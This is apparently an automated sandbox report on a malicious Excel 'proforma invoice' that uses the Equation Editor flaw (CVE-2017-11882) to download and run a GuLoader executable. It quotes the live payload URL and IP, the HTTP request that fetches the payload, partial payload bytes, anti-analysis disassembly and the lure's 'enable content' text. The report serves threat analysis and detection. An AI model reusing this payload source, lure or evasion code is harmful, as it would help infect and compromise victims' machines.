Analysis Report PL_Proforma Invoice.xlsx

Overview

General Information

Sample Name: PL_Proforma Invoice.xlsx
Analysis ID: 342812
MD5: 07518e9ef3f985d592423d9c60c5c895
SHA1: 973721e65ade599942b6a166fedf17d0ccc7feb6
SHA256: 16ccda8530923cd7a4c92d8f2cfbb89c99c476c928e5af6e8248374e24a09f60
Tags: HostgatorVelvetSweatshopxlsx

Most interesting Screenshot:

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected GuLoader
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://kalamikwsdyonlinwtmg.dns.army/kaladoc/vbc.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Virustotal: Detection: 10% Perma Link
Source: C:\Users\Public\vbc.exe Virustotal: Detection: 10% Perma Link
Multi AV Scanner detection for submitted file
Source: PL_Proforma Invoice.xlsx Virustotal: Detection: 31% Perma Link
Source: PL_Proforma Invoice.xlsx ReversingLabs: Detection: 23%

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

barindex
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: kalamikwsdyonlinwtmg.dns.army
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 103.125.191.78:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 103.125.191.78:80

Networking:

barindex
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 21 Jan 2021 17:59:17 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Thu, 21 Jan 2021 09:21:44 GMTETag: "18000-5b96599a963e0"Accept-Ranges: bytesContent-Length: 98304Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 c8 c4 49 93 a9 aa 1a 93 a9 aa 1a 93 a9 aa 1a 10 b5 a4 1a 92 a9 aa 1a dc 8b a3 1a 9f a9 aa 1a a5 8f a7 1a 92 a9 aa 1a 52 69 63 68 93 a9 aa 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 86 1d 25 55 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 40 01 00 00 40 00 00 00 00 00 00 64 13 00 00 00 10 00 00 00 50 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 90 01 00 00 10 00 00 f9 84 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 49 01 00 28 00 00 00 00 70 01 00 26 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 02 00 00 20 00 00 00 00 10 00 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 18 3e 01 00 00 10 00 00 00 40 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 68 15 00 00 00 50 01 00 00 10 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 26 19 00 00 00 70 01 00 00 20 00 00 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 103.125.191.78 103.125.191.78
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /kaladoc/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kalamikwsdyonlinwtmg.dns.armyConnection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\45EE6A89.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /kaladoc/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kalamikwsdyonlinwtmg.dns.armyConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: kalamikwsdyonlinwtmg.dns.army

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable editing button from the yellow bar above. Once you have enabled editing, please click Enable
Source: Screenshot number: 4 Screenshot OCR: Enable Content button from the yellow bar above. 21 22 23 24 25 26 27 28 29 _ . 30 " " "
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Abnormal high CPU Usage
Source: C:\Users\Public\vbc.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040745A 4_2_0040745A
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: PL_Proforma Invoice.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
PE file contains strange resources
Source: vbc[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@4/6@2/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$PL_Proforma Invoice.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR3330.tmp Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: PL_Proforma Invoice.xlsx Virustotal: Detection: 31%
Source: PL_Proforma Invoice.xlsx ReversingLabs: Detection: 23%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: PL_Proforma Invoice.xlsx Static file information: File size 2516480 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: PL_Proforma Invoice.xlsx Initial sample: OLE indicators vbamacros = False
Source: PL_Proforma Invoice.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2816, type: MEMORY
Yara detected VB6 Downloader Generic
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2816, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_00404851 push 1C000090h; iretd 4_2_0040487A
Source: C:\Users\Public\vbc.exe Code function: 4_2_004044FE push esi; iretd 4_2_004044FF
Source: C:\Users\Public\vbc.exe Code function: 4_2_004092DF push 00000043h; iretd 4_2_004092E3
Source: C:\Users\Public\vbc.exe Code function: 4_2_004063D8 push ds; retf 4_2_004063DB
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E32BC pushfd ; iretd 4_2_002E32BD
Source: initial sample Static PE information: section name: .text entropy: 6.92993143866
Source: initial sample Static PE information: section name: .text entropy: 6.92993143866

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: PL_Proforma Invoice.xlsx Stream path 'EncryptedPackage' entropy: 7.99992498331 (max. 8.0)

Malware Analysis System Evasion:

barindex
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000002E0290 second address: 00000000002E0290 instructions:
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000002E0391 second address: 00000000002E0391 instructions:
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000002E0290 second address: 00000000002E0290 instructions:
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000002E0391 second address: 00000000002E0391 instructions:
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000002E2B65 second address: 00000000002E2B65 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FE560D02F88h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d jmp 00007FE560D02FA2h 0x0000001f cmp cx, cx 0x00000022 pop ecx 0x00000023 add edi, edx 0x00000025 test bh, 00000073h 0x00000028 dec ecx 0x00000029 cmp ecx, 00000000h 0x0000002c jne 00007FE560D02F4Bh 0x0000002e push ecx 0x0000002f call 00007FE560D02FE8h 0x00000034 call 00007FE560D02F98h 0x00000039 lfence 0x0000003c mov edx, dword ptr [7FFE0014h] 0x00000042 lfence 0x00000045 ret 0x00000046 mov esi, edx 0x00000048 pushad 0x00000049 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E584C rdtsc 4_2_002E584C
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1976 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: vbc.exe Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E584C rdtsc 4_2_002E584C
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E4800 mov eax, dword ptr fs:[00000030h] 4_2_002E4800
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E1C00 mov eax, dword ptr fs:[00000030h] 4_2_002E1C00
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E5017 mov eax, dword ptr fs:[00000030h] 4_2_002E5017
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E14A4 mov eax, dword ptr fs:[00000030h] 4_2_002E14A4
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E19B6 mov eax, dword ptr fs:[00000030h] 4_2_002E19B6
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E29E0 mov eax, dword ptr fs:[00000030h] 4_2_002E29E0
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E5799 mov eax, dword ptr fs:[00000030h] 4_2_002E5799
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E5793 mov eax, dword ptr fs:[00000030h] 4_2_002E5793
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E1BF8 mov eax, dword ptr fs:[00000030h] 4_2_002E1BF8

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: vbc.exe, 00000004.00000002.2399583028.00000000008E0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: vbc.exe, 00000004.00000002.2399583028.00000000008E0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000004.00000002.2399583028.00000000008E0000.00000002.00000001.sdmp Binary or memory string: !Progman
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 342812 Sample: PL_Proforma Invoice.xlsx Startdate: 21/01/2021 Architecture: WINDOWS Score: 100 24 Antivirus detection for URL or domain 2->24 26 Multi AV Scanner detection for dropped file 2->26 28 Multi AV Scanner detection for submitted file 2->28 30 12 other signatures 2->30 6 EQNEDT32.EXE 12 2->6         started        11 EXCEL.EXE 37 17 2->11         started        process3 dnsIp4 22 kalamikwsdyonlinwtmg.dns.army 103.125.191.78, 49165, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 6->22 16 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 6->16 dropped 18 C:\Users\Public\vbc.exe, PE32 6->18 dropped 32 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 6->32 13 vbc.exe 1 6->13         started        20 C:\Users\user\...\~$PL_Proforma Invoice.xlsx, data 11->20 dropped file5 signatures6 process7 signatures8 34 Multi AV Scanner detection for dropped file 13->34 36 Detected RDTSC dummy instruction sequence (likely for instruction hammering) 13->36 38 Tries to detect virtualization through RDTSC time measurements 13->38
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
103.125.191.78
 unknown Viet Nam
135905 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN true

Contacted Domains

Name IP Active
kalamikwsdyonlinwtmg.dns.army 103.125.191.78 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://kalamikwsdyonlinwtmg.dns.army/kaladoc/vbc.exe true
  • 1%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown